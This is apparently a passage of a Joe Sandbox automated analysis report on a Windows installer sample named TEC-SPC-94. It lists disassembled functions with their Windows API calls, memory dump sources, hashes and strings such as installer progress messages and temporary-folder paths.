                                                          • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                          • Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                          • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                          Function 00404ABC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                          • GetMessagePos.USER32 ref: 00404ADF
                                                          • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                          Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D44
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Times New Roman
                                                          • API String ID: 3808545654-927190056
                                                          • Opcode ID: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                          • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                          • Opcode Fuzzy Hash: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                          • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                          Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                          • wsprintfW.USER32 ref: 00402CD1
                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                          • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                          Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 4216380887-0
                                                          • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                          • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                          • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                          • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                          Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                          Function 004049D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                          • wsprintfW.USER32 ref: 00404A70
                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$&B
                                                          • API String ID: 3540041739-2907463167
                                                          • Opcode ID: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                          • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                          • Opcode Fuzzy Hash: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                          • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                          Function 00402331 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp
                                                          • API String ID: 1356686001-3354810224
                                                          • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                          • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                          • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                          • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                          Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                          • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                          • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                          • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                          Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                          Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                          • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                          • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                          Function 00405993 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00405999
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 004059A3
                                                          • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405993
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3936084776
                                                          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                          • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                                          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                          • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                                          Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                          • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                          Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
